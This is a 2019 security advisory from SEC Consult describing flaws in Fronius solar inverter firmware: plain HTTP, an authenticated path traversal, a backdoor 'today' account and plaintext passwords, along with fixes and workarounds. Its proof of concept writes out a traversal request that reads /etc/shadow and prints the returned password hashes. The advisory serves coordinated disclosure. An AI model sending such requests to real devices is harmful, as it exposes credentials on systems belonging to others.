Share
SEC Consult Vulnerability Lab Security Advisory < 20191203-0 >  
=======================================================================  
title: Multiple vulnerabilites  
product: Fronius Solar Inverter Series  
vulnerable version: SW Version <3.14.1 (HM 1.12.1)  
fixed version: >=3.14.1 (vuln 2: 3.12.5 - HM 1.10.5), see solution  
section below  
CVE number: CVE-2019-19228, CVE-2019-19229  
impact: High  
homepage: https://www.fronius.com  
found: 2018-10-31  
by: T. Weber (Office Vienna)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Europe | Asia | North America  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"A passion for new technologies, intensive research and revolutionary solutions  
have been shaping the Fronius brand since 1945. As the technology leader, we  
find, develop and implement innovative methods to monitor and control energy  
for welding technology, photovoltaics and battery charging. We forge new paths,  
try something difficult and succeed where others have failed in achieving what  
seems to be impossible. [...]"  
  
Source: http://www.fronius.com/en/about-fronius/company-values  
  
  
Business recommendation:  
------------------------  
The vendor automatically performed a fleet update of the solar inverters in the field  
in order to patch them. Nevertheless, as not all devices could be reached through such  
an update, all remaining users are advised to install the patches provided  
by the vendor immediately.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Unencrypted Communication  
The whole communication is handled over HTTP. There is no possibility to  
activate an HTTPS web service. This vulnerability cannot be fixed by the vendor  
in the current solar inverter generation, see the workaround section below.  
  
  
2) Authenticated Path Traversal (CVE-2019-19229)  
A path traversal attack for authenticated users is possible. This allows getting  
access to the operating system of the device and access information like  
network configurations and connections to other hosts or potentially other  
sensitive information.  
  
This vulnerability has been fixed in March 2019 in version 3.12.5. (HM 1.10.5).  
  
The web server runs with "nobody" privileges, but nearly all files on the  
file system are world-readable and can be extracted. This can be seen as  
another vulnerability but according to the vendor this cannot be fixed in the  
current solar inverter generation.  
  
  
3) Backdoor Account (CVE-2019-19228)  
The web interface has a backdoor user account with the username "today".  
This user account has all permissions of all other users ("service",  
"admin" and "user") together.  
As its name suggests, the password for the user "today" changes every day  
and seems to be different to other devices with the same firmware. This  
means that some device-specific strings (e.g. the public device-ID) is  
mixed up every day to generate a new password.  
This account is being used by Fronius support in order to access the  
device upon request from the user.  
  
The fix for this issue has been split in two parts. The "password reset"  
part has been fixed in version 3.14.1 (HM 1.12.1) and the second part providing the  
support account needs an architectural rework which will be fixed in a  
future version (planned for 3.15.1 (HM 1.15.1)).  
  
The passwords for all users of the web interface are stored in plain-text.  
This can be seen as another vulnerability and it has been fixed in  
version 3.14.1 (HM 1.12.1).  
  
  
4) Outdated and Vulnerable Software Components  
Outdated and vulnerable software components were found on the device during  
a quick examination. Not all of the outdated components can be fixed by the vendor  
in the current solar inverter generation, see the workaround section below.  
  
  
Proof of concept:  
-----------------  
1) Unencrypted Communication  
By using an interceptor proxy this vulnerability can be verified in a  
simple way.  
  
  
2) Authenticated Path Traversal (CVE-2019-19229)  
By sending the following request to the following endpoint, a path traversal  
vulnerability can be triggered:  
http://<IP-Address>/admincgi-bin/service.fcgi  
  
Request to read the "/etc/shadow" password file:  
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€  
|GET /admincgi-bin/service.fcgi?action=download&filename=../../../../../etc/shadow  
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€  
  
As response, the file is returned without line breaks. In this example the  
line breaks are added for better readability:  
  
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€  
|HTTP/1.1 200 OK  
|Content-Type: application/force-download  
|Content-Disposition: attachment; filename=../../../../../etc/shadow  
|Connection: close  
|Date: Sun, 28 Oct 2018 08:20:27 GMT  
|Server: webserver  
|  
|root:$1$6MNb1Vq3$oU4TaPqQ782Y2ybdWLICh1:0:1:99999:7:::  
|nobody:*:10897:0:99999:7:::  
|messagebus:$1$6JrvtnWp$T.JvjxjbGTCD.jF7.hhb3.:15638:0:99999:7:::  
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€  
  
By retrieving the file "/etc/issue" an easter-egg was found:  
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€  
| __ ___ _ _ _ _ __ ___ _ __ __ _  
|\\ \\ / (_|_|_|_) |_ __ __ _ __ _ __ _ / / | \\| | \\ \\ / /___| |__  
| \\ \\/\\/ /| | | | | | ' \\/ _` / _` / _` | / / | |) | |__ \\ \\/\\/ // -_) '_ \\  
| \\_/ \\_/ |_|_|_|_|_|_|_|_\\__,_\\__,_\\__,_| /_/ |___/|____| \\_/ \\_/\\___|_.__/  
|Congratulations to all non Fronius employees which have come so far :)  
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€  
  
3) Backdoor Account (CVE-2019-19228)  
The passwords of the web interface of the affected versions are stored in the file  
"/tmp/web_users.conf" in clear text:  
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€  
|admin:<user-password>  
|service:<user-password>  
|today:<40-bit hash-value>  
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€  
  
The password for "today", which is generated by some algorithm, is suspected  
to be a sha1-hash which includes the system-time. A detailed firmware analysis  
can reveal the algorithm but has not been performed for this advisory.  
  
  
4) Outdated and Vulnerable Software Components  
By using the path traversal vulnerability (2) a lot of components are found to  
be outdated:  
  
* Busybox 1.22.1 (December 23, 2014) multiple CVEs  
* Lighttpd 1.4.33 (September 27, 2013) multiple CVEs  
* Linux kernel 4.1.39 (March 13, 2017) multiple CVEs  
  
The used SDK is based on the OSELAS toolchain from 2011 and U-Boot from 2012:  
* gcc version 4.6.2 (OSELAS.Toolchain-2011.11.1)  
* U-Boot 2012.07-3  
  
  
Vulnerable / tested versions:  
-----------------------------  
The Fronius Symo 10.0-3-M (1) SWVersion 3.10.3-1 (HM 1.9.2) was tested but more solar  
inverters from Fronius share this firmware. The following list has been provided by  
the vendor:  
  
Symo Hybrid 3.0-3-M  
Symo Hybrid 4.0-3-M  
Symo Hybrid 5.0-3-M  
Datamanager Box 2.0  
Symo 3.0-3-M *)  
Symo 3.0-3-S *)  
Symo 3.7-3-M *)  
Symo 3.7-3-S *)  
Symo 4.5-3-M *)  
Symo 4.5-3-S *)  
Symo 5.0-3-M *)  
Symo 6.0-3-M *)  
Symo 7.0-3-M *)  
Symo 8.2-3-M *)  
Symo 10.0-3-M *) (tested)  
Symo 10.0-3-M-OS *)  
Symo 12.5-3-M *)  
Symo 15.0-3-M *)  
Symo 17.5-3-M *)  
Symo 20.0-3-M *)  
Galvo 1.5-1 *)  
Galvo 2.0-1 *)  
Galvo 2.5-1 *)  
Galvo 3.0-1 *)  
Galvo 3.1-1 *)  
Galvo 1.5-1 208-240 *)  
Galvo 2.0-1 208-240 *)  
Galvo 2.5-1 208-240 *)  
Galvo 3.1-1 208-240 *)  
Primo 3.0-1 *)  
Primo 3.5-1 *)  
Primo 3.6-1 *)  
Primo 4.0-1 *)  
Primo 4.6-1 *)  
Primo 5.0-1 *)  
Primo 5.0-1 AUS *)  
Primo 5.0-1 SC *)  
Primo 6.0-1 *)  
Primo 8.2-1 *)  
Primo 3.8-1 208-240 *)  
Primo 5.0-1 208-240 *)  
Primo 6.0-1 208-240 *)  
Primo 7.6-1 208-240 *)  
Primo 8.2-1 208-240 *)  
Primo 10.0-1 208-240 *)  
Primo 11.4-1 208-240 *)  
Primo 12.5-1 208-240 *)  
Primo 15.0-1 208-240 *)  
Symo 10.0-3 208-240 *)  
Symo 10.0-3 480 *)  
Symo 12.0-3 208-240 *)  
Symo 12.5-3 480 *)  
Symo 15.0-3 107 *)  
Symo 15.0-3 480 *)  
Symo 17.5-3 480 *)  
Symo 20.0-3 480 *)  
Symo 22.7-3 480 *)  
Symo 24.0-3 480 *)  
Eco 25.0-3-S *)  
Eco 27.0-3-S *)  
Symo Advanced 10.0-3 208-240 *)  
Symo Advanced 12.0-3 208-240 *)  
Symo Advanced 15.0-3 480 *)  
Symo Advanced 20.0-3 480 *)  
Symo Advanced 22.7-3 480 *)  
Symo Advanced 24.0-3 480 *)  
*) only with Datamanager card/box  
  
  
Vendor contact timeline:  
------------------------  
2018-11-05: Contacting vendor through contact@fronius.com, requesting  
security contact  
2018-11-06: Vendor replies and confirms security issues  
2018-12-03: Meeting with vendor to discuss security issues  
2019-01 - 2019-11: Multiple telcos discussing Fronius' rollout plan and fixes  
2019-03-18: Release of version 3.12.5 (HM 1.10.5) which fixes the path traversal vulnerability  
2019-07-30: Release of version 3.14.1 (HM 1.12.1) which fixes many of the other reported issues  
2019-08 - 2019-11: Testing & Fleet update to version 3.14.1 (HM 1.12.1)  
2019-12-03: Coordinated release of security advisory  
  
  
Solution:  
---------  
The vendor provides a patched firmware via their download portal. Visit  
the download page and search for "firmware update" and choose the  
"Fronius Solar.update Datamanager V3.14.1-10" firmware.  
  
The new version v3.14.1 (HM 1.12.1) which contains most of the security fixes can be  
downloaded directly as well:  
https://www.fronius.com/~/downloads/Solar%20Energy/Firmware/SE_FW_Fronius_Solar.update_Datamanager_EN.zip  
  
Some of the identified vulnerabilities (e.g. issue 1 and parts of 4) cannot be fixed  
in the current solar inverter product/software generation. Issue 2 (path traversal)  
has been fixed in version 3.12.5 (HM 1.10.5).  
  
  
Workaround:  
-----------  
Restrict network access to the device as much as possible and disable port forwarding  
from the Internet. Fronius Solar.Web access is still possible.  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Europe | Asia | North America  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/career/index.html  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/contact/index.html  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF T. Weber / @2019